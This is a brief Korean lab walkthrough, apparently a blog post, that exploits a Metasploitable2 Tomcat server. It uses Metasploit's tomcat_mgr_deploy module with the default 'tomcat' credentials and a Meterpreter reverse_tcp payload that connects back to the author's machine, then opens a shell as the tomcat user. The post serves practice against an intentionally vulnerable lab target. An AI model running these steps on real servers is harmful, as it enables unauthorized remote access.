이번엔 (2)에서 알아낸 tomcat 서버의 아이디와 패스워드를 이용하여


관리자 페이지 내에 있는 war file to deploy라는 업로드 기능의


취약점을 이용하여 Tomcat 서버의 관리자 권한을 얻어보자



msfconsole



search tomcat 으로 검색



use exploit/multi/http/tomcat_mgr_deploy


set payload java/meterpreter/reverse_tcp


show options



set password tomcat


set rhost 192.168.17.10 (metasploitable2)


set rport 8180 (metasploitable2)


set username tomcat


set lhost 192.168.17.40 (내 ip)



이제 세팅은 끝이다 exploit을 입력하면 공격한다.



공격 성공


help를 입력하면 여러 명령어를 볼수 있다



이 많은 명령어 중에 shell을 입력하면 쉘로 들어갈 수 있다



tomcat id로 접속된걸 알수 있다


끝~